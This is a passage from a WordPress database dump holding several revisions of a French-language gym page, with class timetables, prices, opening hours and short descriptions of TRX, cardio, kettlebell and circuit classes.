calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:32:37', '2013-07-03 16:32:37', '', 11, 'http://www.crosstrainingcenter.be/?p=168', 0, 'revision', '', 0),
(172, 1, '2013-07-03 16:35:39', '2013-07-03 16:35:39', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:35:39', '2013-07-03 16:35:39', '', 11, 'http://www.crosstrainingcenter.be/?p=172', 0, 'revision', '', 0),
(187, 1, '2013-07-03 17:33:38', '2013-07-03 17:33:38', '<h2>Team Training :</h2>\r\n<h4>\r\nEn semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:33:38', '2013-07-03 17:33:38', '', 11, 'http://www.crosstrainingcenter.be/?p=187', 0, 'revision', '', 0),
(174, 1, '2013-07-03 16:43:44', '2013-07-03 16:43:44', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:43:44', '2013-07-03 16:43:44', '', 11, 'http://www.crosstrainingcenter.be/?p=174', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(175, 1, '2013-07-03 16:49:05', '2013-07-03 16:49:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; 